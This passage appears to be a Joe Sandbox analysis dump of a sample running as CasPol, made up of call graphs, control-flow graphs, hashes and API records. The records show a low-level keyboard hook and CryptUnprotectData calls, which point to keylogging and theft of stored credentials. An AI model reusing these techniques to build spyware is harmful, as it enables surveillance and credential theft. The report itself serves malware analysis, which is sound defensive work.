89845->89846 89847 1749340 5 API calls 89845->89847 89848 1749328 5 API calls 89845->89848 89847->89845 89848->89845 89850 1747e63 89849->89850 89851 17481c4 89850->89851 89852 1749340 5 API calls 89850->89852 89853 1749328 5 API calls 89850->89853 89852->89850 89853->89850 89855 174bd4d 89854->89855 89856 174be87 89854->89856 89855->89856 89859 174be3f 89855->89859 89861 174bd20 2 API calls 89855->89861 89865 174bed8 89855->89865 89858 174bf6e 89856->89858 89870 174c7a0 89856->89870 89857 174be7d 89857->89828 89859->89856 89859->89857 89863 174bd20 2 API calls 89859->89863 89861->89855 89863->89859 89866 174bf6e 89865->89866 89867 174bef7 89865->89867 89869 174c7a0 2 API calls 89867->89869 89868 174bf57 89868->89855 89869->89868 89871 174c7b5 89870->89871 89875 174cf00 89871->89875 89880 174cef0 89871->89880 89872 174bf57 89872->89828 89876 174cf1d 89875->89876 89877 174cffe 89875->89877 89876->89877 89885 174dee8 89876->89885 89890 174dee1 89876->89890 89877->89872 89881 174cef3 89880->89881 89882 174cffe 89881->89882 89883 174dee1 2 API calls 89881->89883 89884 174dee8 2 API calls 89881->89884 89882->89872 89883->89882 89884->89882 89889 174df0f 89885->89889 89886 174d220 PeekMessageW 89886->89889 89887 174e204 89887->89877 89889->89886 89889->89887 89895 174d26c 89889->89895 89894 174df0f 89890->89894 89891 174d220 PeekMessageW 89891->89894 89892 174e204 89892->89877 89893 174d26c DispatchMessageW 89893->89894 89894->89891 89894->89892 89894->89893 89896 174f6a8 DispatchMessageW 89895->89896 89897 174f714 89896->89897 89897->89889 89899 1742c80 89898->89899 89900 1742e88 89899->89900 89901 1742ee3 89899->89901 89916 1744260 89899->89916 89921 1744252 89899->89921 89900->89901 89902 174dee1 2 API calls 89900->89902 89903 174dee8 2 API calls 89900->89903 89926 174e228 89900->89926 89901->89835 89902->89901 89903->89901 89908 17411c7 89907->89908 89909 1742e88 89908->89909 89910 1742ee3 89908->89910 89914 1744260 6 API calls 89908->89914 89915 1744252 6 API calls 89908->89915 89909->89910 89911 174dee1 2 API calls 89909->89911 89912 174dee8 2 API calls 89909->89912 89913 174e228 2 API calls 89909->89913 89910->89835 89911->89910 89912->89910 89913->89910 89914->89909 89915->89909 89917 1744281 89916->89917 89918 17442a5 89917->89918 89931 17443ff 89917->89931 89935 1744410 89917->89935 89918->89900 89922 1744256 89921->89922 89923 17442a5 89922->89923 89924 1744410 6 API calls 89922->89924 89925 17443ff 6 API calls 89922->89925 89923->89900 89924->89923 89925->89923 89929 174e28d 89926->89929 89927 174d220 PeekMessageW 89927->89929 89928 174d26c DispatchMessageW 89928->89929 89929->89927 89929->89928 89930 174e2da 89929->89930 89930->89901 89932 174441d 89931->89932 89933 1744456 89932->89933 89939 174299c 89932->89939 89933->89918 89936 174441d 89935->89936 89937 174299c 6 API calls 89936->89937 89938 1744456 89936->89938 89937->89938 89938->89918 89940 17429a7 89939->89940 89941 17444c8 89940->89941 89943 17429d0 89940->89943 89944 17429db 89943->89944 89950 17429e0 89944->89950 89946 1744537 89956 1749340 89946->89956 89965 1749328 89946->89965 89947 1744571 89947->89941 89951 17429eb 89950->89951 89973 1744de8 89951->89973 89953 1745570 89953->89946 89954 1744260 6 API calls 89954->89953 89955 1745348 89955->89953 89955->89954 89958 1749371 89956->89958 89960 1749471 89956->89960 89957 174937d 89957->89947 89958->89957 89981 1749750 89958->89981 89985 1749740 89958->89985 89959 17493bd 89989 1f9b48a0 89959->89989 89999 1f9b4892 89959->89999 89966 1749340 89965->89966 89968 174937d 89966->89968 89969 1749750 4 API calls 89966->89969 89970 1749740 4 API calls 89966->89970 89967 17493bd 89971 1f9b4892 2 API calls 89967->89971 89972 1f9b48a0 2 API calls 89967->89972 89968->89947 89969->89967 89970->89967 89971->89968 89972->89968 89974 1744df3 89973->89974 89976 1746461 89974->89976 89977 1744e18 89974->89977 89976->89955 89978 1746550 FindWindowW 89977->89978 89980 17465d5 89978->89980 89980->89976 90009 1749780 89981->90009 90020 1749790 89981->90020 89982 174975a 89982->89959 89986 174975a 89985->89986 89987 1749790 4 API calls 89985->89987 89988 1749780 4 API calls 89985->89988 89986->89959 89987->89986 89988->89986 89990 1f9b48cb 89989->89990 90031 1f9b4e71 89990->90031 90036 1f9b4e80 89990->90036 89991 1f9b494e 89992 1f9b37c8 GetModuleHandleW 89991->89992 89994 1f9b497a 89991->89994 89993 1f9b49be 89992->89993 89997 1f9b6798 CreateWindowExW 89993->89997 89998 1f9b67a8 CreateWindowExW 89993->89998 89997->89994 89998->89994 90000 1f9b48cb 89999->90000 90007 1f9b4e71 GetModuleHandleW 90000->90007 90008 1f9b4e80 GetModuleHandleW 90000->90008 90001 1f9b494e 90002 1f9b497a 90001->90002 90041 1f9b37c8 90001->90041 90002->90002 90007->90001 90008->90001 90010 1749790 90009->90010 90013 17497c4 90010->90013 90015 1f9b5349 GetModuleHandleW 90010->90015 90016 1f9b37c8 GetModuleHandleW 90010->90016 90017 1f9b5321 GetModuleHandleW 90010->90017 90011 17497ac 90011->90013 90018 1749790 LoadLibraryExW GetModuleHandleW GetModuleHandleW GetModuleHandleW 90011->90018 90019 1749780 LoadLibraryExW GetModuleHandleW GetModuleHandleW GetModuleHandleW 90011->90019 90012 17497bc 90012->90013 90014 17484fc LoadLibraryExW 90012->90014 90013->89982 90014->90013 90015->90011 90016->90011 90017->90011 90018->90012 90019->90012 90021 17497a1 90020->90021 90024 17497c4 90020->90024 90028 1f9b5349 GetModuleHandleW 90021->90028 90029 1f9b37c8 GetModuleHandleW 90021->90029 90030 1f9b5321 GetModuleHandleW 90021->90030 90022 17497ac 90022->90024 90026 1749790 LoadLibraryExW GetModuleHandleW GetModuleHandleW GetModuleHandleW 90022->90026 90027 1749780 LoadLibraryExW GetModuleHandleW GetModuleHandleW GetModuleHandleW 90022->90027 90023 17497bc 90023->90024 90025 17484fc LoadLibraryExW 90023->90025 90024->89982 90025->90024 90026->90023 90027->90023 90028->90022 90029->90022 90030->90022 90032 1f9b4ead 90031->90032 90033 1f9b4f2e 90032->90033 90034 1f9b4ff0 GetModuleHandleW 90032->90034 90035 1f9b4fe0 GetModuleHandleW 90032->90035 90034->90033 90035->90033 90037 1f9b4ead 90036->90037 90038 1f9b4f2e 90037->90038 90039 1f9b4ff0 GetModuleHandleW 90037->90039 90040 1f9b4fe0 GetModuleHandleW 90037->90040 90039->90038 90040->90038 90042 1f9b5350 GetModuleHandleW 90041->90042 90044 1f9b49be 90042->90044 90045 1f9b67a8 90044->90045 90048 1f9b6798 90044->90048 90046 1f9b4674 CreateWindowExW 90045->90046 90047 1f9b67dd 90046->90047 90047->90002 90049 1f9b67a8 90048->90049 90050 1f9b4674 CreateWindowExW 90049->90050 90051 1f9b67dd 90050->90051 90051->90002 90071 151e8a0 90052->90071 90079 151e8b0 90052->90079 90053 151e80f 90056 151e988 90053->90056 90057 151e996 90056->90057 90058 151e9b9 90056->90058 90057->89809 90059 151ea1e 90058->90059 90062 151ea2d 90058->90062 90060 151e7e8 3 API calls 90059->90060 90061 151ea25 90060->90061 90061->89809 90062->90061 90063 151ec69 3 API calls 90062->90063 90063->90061 90065 151e9f5 90064->90065 90066 151ea1e 90065->90066 90069 151ea2d 90065->90069 90067 151e7e8 3 API calls 90066->90067 90068 151ea25 90067->90068 90068->89811 90069->90068 90070 151ec69 3 API calls 90069->90070 90070->90068 90073 151e8af 90071->90073 90072 151e905 90072->90053 90073->90072 90074 151ea1e 90073->90074 90077 151ea2d 90073->90077 90075 151e7e8 3 API calls 90074->90075 90076 151ea25 90075->90076 90076->90053 90077->90076 90087 151ec69 90077->90087 90080 151e905 90079->90080 90081 151e8c4 90079->90081 90080->90053 90081->90080 90082 151ea1e 90081->90082 90085 151ea2d 90081->90085 90083 151e7e8 3 API calls 90082->90083 90084 151ea25 90083->90084 90084->90053 90085->90084 90086 151ec69 3 API calls 90085->90086 90086->90084 90091 151eca1 90087->90091 90099 151ecb0 90087->90099 90088 151ec86 90088->90076 90092 151ece5 90091->90092 90093 151ecbd 90091->90093 90107 1511d9c 90092->90107 90093->90088 90095 151ed06 90095->90088 90097 151edce GlobalMemoryStatusEx 90098 151edfe 90097->90098 90098->90088 90100 151ece5 90099->90100 90101 151ecbd 90099->90101 90102 1511d9c GlobalMemoryStatusEx 90100->90102 90101->90088 90104 151ed02 90102->90104 90103 151ed06 90103->90088 90104->90103 90105 151edce GlobalMemoryStatusEx 90104->90105 90106 151edfe 90105->90106 90106->90088 90108 151ed88 GlobalMemoryStatusEx 90107->90108 90110 151ed02 90108->90110 90110->90095 90110->90097

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 143 1662768-166278b 144 1662796-16627b6 143->144 145 166278d-1662793 143->145 148 16627bd-16627c4 144->148 149 16627b8 144->149 145->144 150 16627c6-16627d1 148->150 151 1662b4c-1662b55 149->151 152 16627d7-16627ea 150->152 153 1662b5d-1662b99 150->153 156 1662800-166281b 152->156 157 16627ec-16627fa 152->157 161 1662ba2-1662ba6 153->161 162 1662b9b-1662ba0 153->162 163 166283f-1662842 156->163 164 166281d-1662823 156->164 157->156 165 1662ad4-1662adb 157->165 166 1662bac-1662bad 161->166 162->166 170 166299c-16629a2 163->170 171 1662848-166284b 163->171 167 1662825 164->167 168 166282c-166282f 164->168 165->151 169 1662add-1662adf 165->169 167->168 167->170 172 1662862-1662868 167->172 173 1662a8e-1662a91 167->173 168->172 174 1662831-1662834 168->174 175 1662ae1-1662ae6 169->175 176 1662aee-1662af4 169->176 170->173 177 16629a8-16629ad 170->177 171->170 178 1662851-1662857 171->178 183 166286e-1662870 172->183 184 166286a-166286c 172->184 185 1662a97-1662a9d 173->185 186 1662b58 173->186 179 16628ce-16628d4 174->179 180 166283a 174->180 175->176 176->153 181 1662af6-1662afb 176->181 177->173 178->170 182 166285d 178->182 179->173 189 16628da-16628e0 179->189 180->173 187 1662b40-1662b43 181->187 188 1662afd-1662b02 181->188 182->173 190 166287a-1662883 183->190 184->190 191 1662ac2-1662ac6 185->191 192 1662a9f-1662aa7 185->192 186->153 187->186 194 1662b45-1662b4a 187->194 188->186 195 1662b04 188->195 196 16628e6-16628e8 189->196 197 16628e2-16628e4 189->197 199 1662896-166289b 190->199 200 1662885-1662890 190->200 191->165 193 1662ac8-1662ace 191->193 192->153 198 1662aad-1662abc 192->198 193->150 193->165 194->151 194->169 201 1662b0b-1662b10 195->201 202 16628f2-1662909 196->202 197->202 198->156 198->191 204 16628a1-16628be 199->204 200->173 200->199 205 1662b32-1662b34 201->205 206 1662b12-1662b14 201->206 213 1662934-166295b 202->213 214 166290b-1662924 202->214 220 16628c4-16628c9 204->220 221 16629b2-16629e8 204->221 205->186 209 1662b36-1662b39 205->209 210 1662b16-1662b1b 206->210 211 1662b23-1662b29 206->211 209->187 210->211 211->153 212 1662b2b-1662b30 211->212 212->205 216 1662b06-1662b09 212->216 213->186 226 1662961-1662964 213->226 214->221 224 166292a-166292f 214->224 216->186 216->201 220->221 227 16629f5-16629fd 221->227 228 16629ea-16629ee 221->228 224->221 226->186 229 166296a-1662993 226->229 227->186 232 1662a03-1662a08 227->232 230 16629f0-16629f3 228->230 231 1662a0d-1662a11 228->231 229->221 244 1662995-166299a 229->244 230->227 230->231 233 1662a13-1662a19 231->233 234 1662a30-1662a34 231->234 232->173 233->234 236 1662a1b-1662a23 233->236 237 1662a36-1662a3c 234->237 238 1662a3e-1662a5a 234->238 236->186 239 1662a29-1662a2e 236->239 237->238 241 1662a63-1662a67 237->241 245 1662a5d call 1662d50 238->245 246 1662a5d call 1662d4f 238->246 239->173 241->173 242 1662a69-1662a85 241->242 242->173 244->221 245->241 246->241
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (ogl$(ogl$(ogl$,kl$,kl
                                                                                                                          • API String ID: 0-1985370426
                                                                                                                          • Opcode ID: 977002cba76cb42666d70b6654be27d85840536601578f93771e350bf05167ea
                                                                                                                          • Instruction ID: 25e6d99dbd0f844a34fabef4e476061a0a7beb303b56287fb8173959d0ba7ce6
                                                                                                                          • Opcode Fuzzy Hash: 977002cba76cb42666d70b6654be27d85840536601578f93771e350bf05167ea
                                                                                                                          • Instruction Fuzzy Hash: FBE14870A00109DFDB15CFA9CD94AADBBBAFF88354F198169E905AB361D734EC42CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1295 166de78-166debf 1298 166dec5-166df66 call 166d308 call 1668fe8 call 166a1b0 1295->1298 1299 166e19b-166e1ec 1295->1299 1372 166e196 1298->1372 1373 166df6c-166dfd1 1298->1373 1304 166e207-166e20f 1299->1304 1305 166e1ee-166e1f5 1299->1305 1309 166e212-166e226 1304->1309 1306 166e1f7-166e1fc 1305->1306 1307 166e1fe-166e205 1305->1307 1306->1309 1307->1309 1313 166e23c-166e244 1309->1313 1314 166e228-166e22f 1309->1314 1318 166e246-166e24a 1313->1318 1316 166e235-166e23a 1314->1316 1317 166e231-166e233 1314->1317 1316->1318 1317->1318 1321 166e24c-166e261 1318->1321 1322 166e2aa-166e2ad 1318->1322 1321->1322 1332 166e263-166e266 1321->1332 1323 166e2f5-166e2fb 1322->1323 1324 166e2af-166e2c4 1322->1324 1326 166e301-166e303 1323->1326 1327 166edfe 1323->1327 1324->1323 1336 166e2c6-166e2ca 1324->1336 1326->1327 1330 166e309-166e30e 1326->1330 1339 166ee03-166ee3d 1327->1339 1334 166e314 1330->1334 1335 166edac-166edb0 1330->1335 1337 166e285-166e2a3 1332->1337 1338 166e268-166e26a 1332->1338 1334->1334 1341 166edb7-166edfd 1335->1341 1342 166edb2-166edb5 1335->1342 1343 166e2d2-166e2f0 1336->1343 1344 166e2cc-166e2d0 1336->1344 1337->1322 1338->1337 1345 166e26c-166e26f 1338->1345 1356 166eea5-166eeae 1339->1356 1357 166ee3f-166ee49 1339->1357 1342->1339 1342->1341 1343->1323 1344->1323 1344->1343 1345->1322 1347 166e271-166e283 1345->1347 1347->1322 1347->1337 1360 166eeb1-166eeb2 1356->1360 1357->1360 1361 166ee4b-166ee4d 1357->1361 1363 166eeb5-166eeb6 1360->1363 1361->1363 1364 166ee4f-166ee51 1361->1364 1368 166eeb9-166f006 1363->1368 1367 166ee53-166ee72 1364->1367 1364->1368 1367->1356 1372->1299 1373->1299 1385 166dfd7-166dfdf 1373->1385 1385->1299 1386 166dfe5-166e000 call 16614f0 1385->1386 1389 166e002-166e006 1386->1389 1390 166e03a-166e043 1386->1390 1389->1299 1392 166e00c-166e037 call 1665428 1389->1392 1390->1372 1391 166e049-166e04c 1390->1391 1391->1299 1393 166e052-166e0af 1391->1393 1392->1390 1406 166e106 1393->1406 1407 166e0b1-166e0c2 call 1f9bdae0 1393->1407 1408 166e10b-166e10f 1406->1408 1409 166e0c7-166e0cf 1407->1409 1410 166e111 1408->1410 1411 166e11a 1408->1411 1412 166e0e4-166e104 1409->1412 1413 166e0d1-166e0d8 1409->1413 1410->1411 1411->1372 1412->1408 1413->1406 1414 166e0da-166e0e2 1413->1414 1414->1412
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Xkl$Xkl$Xkl$Xkl
                                                                                                                          • API String ID: 0-4276347257
                                                                                                                          • Opcode ID: e2c47ab887fe65246d6dba7d99648910e0f09b4a2a6afb284ddff182c8b92af2
                                                                                                                          • Instruction ID: b99efb84f46021903ade66a515d329aaaf6d8a55e01e2fbdcf664c70188a2af5
                                                                                                                          • Opcode Fuzzy Hash: e2c47ab887fe65246d6dba7d99648910e0f09b4a2a6afb284ddff182c8b92af2
                                                                                                                          • Instruction Fuzzy Hash: 7EB1F134A042148FDB24DB78C8547AEBAFBAFC9200F15C469D10AAB395CF76DC41CB96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2009 166ae98-166aeaf 2010 166aeb1-166aeb4 2009->2010 2011 166aeb6-166aed2 2010->2011 2012 166aed7-166aeda 2010->2012 2011->2012 2013 166aefc-166aeff 2012->2013 2014 166aedc-166aef7 2012->2014 2015 166af17-166af1a 2013->2015 2016 166af01-166af10 2013->2016 2014->2013 2019 166af21-166af24 2015->2019 2020 166af1c-166af1e 2015->2020 2023 166af26-166af48 2016->2023 2028 166af12 2016->2028 2019->2023 2024 166af49-166af4c 2019->2024 2020->2019 2026 166af60-166af63 2024->2026 2027 166af4e-166af51 2024->2027 2032 166af65 2026->2032 2033 166af6a-166af6d 2026->2033 2030 166af57-166af5b 2027->2030 2031 166b043-166b065 2027->2031 2028->2015 2030->2026 2045 166b086-166b08e 2031->2045 2046 166b068-166b06f 2031->2046 2032->2033 2035 166b013-166b016 2033->2035 2036 166af73-166af76 2033->2036 2035->2027 2039 166b01c 2035->2039 2040 166af88-166af8b 2036->2040 2041 166af78 2036->2041 2042 166b021-166b023 2039->2042 2043 166afae-166afb1 2040->2043 2044 166af8d-166afa9 2040->2044 2049 166af81-166af83 2041->2049 2047 166b025 2042->2047 2048 166b02a-166b02d 2042->2048 2052 166afd4-166afd7 2043->2052 2053 166afb3-166afcd 2043->2053 2044->2043 2058 166b090-166b093 2045->2058 2050 166b094-166b0b5 2046->2050 2051 166b071-166b07b 2046->2051 2047->2048 2048->2010 2056 166b033-166b03d 2048->2056 2049->2040 2067 166b0d6-166b0de 2050->2067 2068 166b0b8-166b0bf 2050->2068 2051->2058 2059 166b07d-166b084 2051->2059 2054 166afe3-166afe6 2052->2054 2055 166afd9-166afdc 2052->2055 2053->2055 2075 166afcf 2053->2075 2064 166afe8-166b004 2054->2064 2065 166b009-166b00c 2054->2065 2062 166b03e 2055->2062 2063 166afde 2055->2063 2059->2045 2062->2031 2063->2054 2064->2065 2065->2056 2070 166b00e-166b011 2065->2070 2076 166b0e0-166b0e3 2067->2076 2071 166b0e4-166b0fd 2068->2071 2072 166b0c1-166b0cb 2068->2072 2070->2035 2070->2042 2071->2068 2082 166b0ff-166b172 2071->2082 2072->2076 2077 166b0cd-166b0d4 2072->2077 2075->2052 2077->2067 2092 166b1a6-166b1cf 2082->2092 2093 166b174-166b18f 2082->2093 2102 166b203-166b23c 2092->2102 2103 166b1d1-166b1ec 2092->2103 2101 166b197-166b19f 2093->2101 2101->2092 2106 166b406-166b424 2102->2106 2107 166b242-166b297 call 166b439 2102->2107 2114 166b1f4-166b1fc 2103->2114 2112 166b425 2106->2112 2121 166b3bf-166b3e3 2107->2121 2122 166b29d-166b2fe call 1f9bdae0 2107->2122 2112->2112 2114->2102 2127 166b3e5 2121->2127 2128 166b3ee 2121->2128 2136 166b304-166b344 call 166de78 2122->2136 2137 166b3ae-166b3b9 2122->2137 2127->2128 2128->2106 2161 166b346 call 104f190 2136->2161 2162 166b346 call 104f181 2136->2162 2137->2121 2137->2122 2145 166b34c-166b35f 2147 166b361-166b367 2145->2147 2148 166b379-166b390 2145->2148 2149 166b36b-166b377 2147->2149 2150 166b369 2147->2150 2156 166b393 call 1531f64 2148->2156 2157 166b393 call 153241b 2148->2157 2158 166b393 call 1531f68 2148->2158 2149->2148 2150->2148 2154 166b399 2154->2137 2156->2154 2157->2154 2158->2154 2161->2145 2162->2145
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: fll$ fll$PHgl
                                                                                                                          • API String ID: 0-3418475106
                                                                                                                          • Opcode ID: 6ee7f0b51c22091b9c95b8ced2fa3513d90e558a1ed612702f6fb3e8a33d8a49
                                                                                                                          • Instruction ID: 8bd1cbc14d21574b78e78c47021694ec47880b0596f440cccaae891ff741aa13
                                                                                                                          • Opcode Fuzzy Hash: 6ee7f0b51c22091b9c95b8ced2fa3513d90e558a1ed612702f6fb3e8a33d8a49
                                                                                                                          • Instruction Fuzzy Hash: 12E1D330B002158FDB119BB8C9947AE7BBAEF89344F248429D506DB785EF34DC4AC792
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (ogl$Hkl
                                                                                                                          • API String ID: 0-4036341770
                                                                                                                          • Opcode ID: 7a5d691e93fe85a99024b65374d46e68ff8a90b461e0287625ed78fc38cb4b9e
                                                                                                                          • Instruction ID: c225855f02fef73d4f16931fbb54be397524efd5a744525d78ad60fee50ee053
                                                                                                                          • Opcode Fuzzy Hash: 7a5d691e93fe85a99024b65374d46e68ff8a90b461e0287625ed78fc38cb4b9e
                                                                                                                          • Instruction Fuzzy Hash: 0B22B074A042199FCB14CF69C9A4AAE7BF6BF88304F15802DE909EB351DB35DC42CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 01741633
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HookWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2559412058-0
                                                                                                                          • Opcode ID: 4b4ec07c371a9f46eee0af09f871b488e951c54428ebadcd04f48ce6cda72d34
                                                                                                                          • Instruction ID: f9a29dd77a1462f1f81a375577227417d09cd6e73cdd091a7b88797d2518adc9
                                                                                                                          • Opcode Fuzzy Hash: 4b4ec07c371a9f46eee0af09f871b488e951c54428ebadcd04f48ce6cda72d34
                                                                                                                          • Instruction Fuzzy Hash: CC2135B1D042089FCB14DF9AC844BEEFBF5EF88314F14842AE455A7250CB74A984CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0153DF5D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823662128.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1530000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 834300711-0
                                                                                                                          • Opcode ID: fd9c535c149e10e65769104b82e1d63076f9a6fd73bc02c80325d8d000966e1e
                                                                                                                          • Instruction ID: bbe5540f34860af08f7886e84033849ef13d11267d13a0a92ad016067ce2ab12
                                                                                                                          • Opcode Fuzzy Hash: fd9c535c149e10e65769104b82e1d63076f9a6fd73bc02c80325d8d000966e1e
                                                                                                                          • Instruction Fuzzy Hash: 182126B28002499FDB10CF99C844BEFBFF5EF88320F14841AE528A7611C379A955DFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0153DF5D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823662128.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1530000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 834300711-0
                                                                                                                          • Opcode ID: 40c05d72bf77b4b7b15f6f5fb905e8312124700309fffedc26129830e67ba2bf
                                                                                                                          • Instruction ID: b90a0f416a2230587cdd1019764873e4d93edc7bc0c5842bc2f6be7342613f4b
                                                                                                                          • Opcode Fuzzy Hash: 40c05d72bf77b4b7b15f6f5fb905e8312124700309fffedc26129830e67ba2bf
                                                                                                                          • Instruction Fuzzy Hash: 36113AB28042499FDB10CF99C444BDEBFF5FF48320F148419E524AB251C379A954DFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 923320dec3a46ececc5463971525e1d1a030e91eac34571291e09b021c38c685
                                                                                                                          • Instruction ID: 8a766ab2fcabd9f02c86f6a95ebcd0a2991f9e7a0e09f0cb4c785c4ad8dedbb5
                                                                                                                          • Opcode Fuzzy Hash: 923320dec3a46ececc5463971525e1d1a030e91eac34571291e09b021c38c685
                                                                                                                          • Instruction Fuzzy Hash: 0342AD30F04244CFEB24DBA8C8547ADBBA6AF85304F158569D509EF396DB74DC84CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 1662d50-1662d75 1 16631a4-16631a8 0->1 2 1662d7b-1662d9e 0->2 3 16631c1-16631cf 1->3 4 16631aa-16631be 1->4 11 1662da4-1662db1 2->11 12 1662e4c-1662e50 2->12 8 1663240-1663255 3->8 9 16631d1 3->9 19 1663257-166325a 8->19 20 166325c-1663269 8->20 14 16631db-16631e6 9->14 24 1662db3-1662dbe 11->24 25 1662dc0 11->25 15 1662e52-1662e60 12->15 16 1662e98-1662ea1 12->16 21 16631ed-16631fa 14->21 22 16631e8-16631eb 14->22 15->16 33 1662e62-1662e7d 15->33 17 16632b7 16->17 18 1662ea7-1662eb1 16->18 32 16632bc-16632d7 17->32 18->1 26 1662eb7-1662ec0 18->26 27 166326b-16632a6 19->27 20->27 28 16631fc-166323d 21->28 22->28 36 1662dc2-1662dc4 24->36 25->36 30 1662ec2-1662ec7 26->30 31 1662ecf-1662edb 26->31 72 16632ad-16632b4 27->72 30->31 31->32 39 1662ee1-1662ee7 31->39 57 1662e7f-1662e89 33->57 58 1662e8b 33->58 36->12 38 1662dca-1662e2c 36->38 82 1662e32-1662e49 38->82 83 1662e2e 38->83 42 166318e-1663192 39->42 43 1662eed-1662efd 39->43 42->17 47 1663198-166319e 42->47 55 1662f11-1662f13 43->55 56 1662eff-1662f0f 43->56 47->1 47->26 59 1662f16-1662f1c 55->59 56->59 60 1662e8d-1662e8f 57->60 58->60 59->42 62 1662f22-1662f31 59->62 60->16 63 1662e91 60->63 68 1662f37 62->68 69 1662fdf-166300a call 1662b88 * 2 62->69 63->16 71 1662f3a-1662f4b 68->71 86 16630f4-166310e 69->86 87 1663010-1663014 69->87 71->32 75 1662f51-1662f63 71->75 75->32 77 1662f69-1662f81 75->77 139 1662f83 call 166bd60 77->139 140 1662f83 call 166bdb0 77->140 141 1662f83 call 166be00 77->141 142 1662f83 call 166b439 77->142 81 1662f89-1662f99 81->42 85 1662f9f-1662fa2 81->85 82->12 83->82 88 1662fa4-1662faa 85->88 89 1662fac-1662faf 85->89 86->1 107 1663114-1663118 86->107 87->42 91 166301a-166301e 87->91 88->89 92 1662fb5-1662fb8 88->92 89->17 89->92 94 1663046-166304c 91->94 95 1663020-166302d 91->95 96 1662fc0-1662fc3 92->96 97 1662fba-1662fbe 92->97 98 1663087-166308d 94->98 99 166304e-1663052 94->99 112 166302f-166303a 95->112 113 166303c 95->113 96->17 100 1662fc9-1662fcd 96->100 97->96 97->100 102 166308f-1663093 98->102 103 1663099-166309f 98->103 99->98 104 1663054-166305d 99->104 100->17 106 1662fd3-1662fd9 100->106 102->72 102->103 110 16630a1-16630a5 103->110 111 16630ab-16630ad 103->111 108 166305f-1663064 104->108 109 166306c-1663082 104->109 106->69 106->71 114 1663154-1663158 107->114 115 166311a-1663124 107->115 108->109 109->42 110->42 110->111 116 16630e2-16630e4 111->116 117 16630af-16630b8 111->117 118 166303e-1663040 112->118 113->118 114->72 119 166315e-1663162 114->119 115->114 127 1663126-166313b 115->127 116->42 123 16630ea-16630f1 116->123 121 16630c7-16630dd 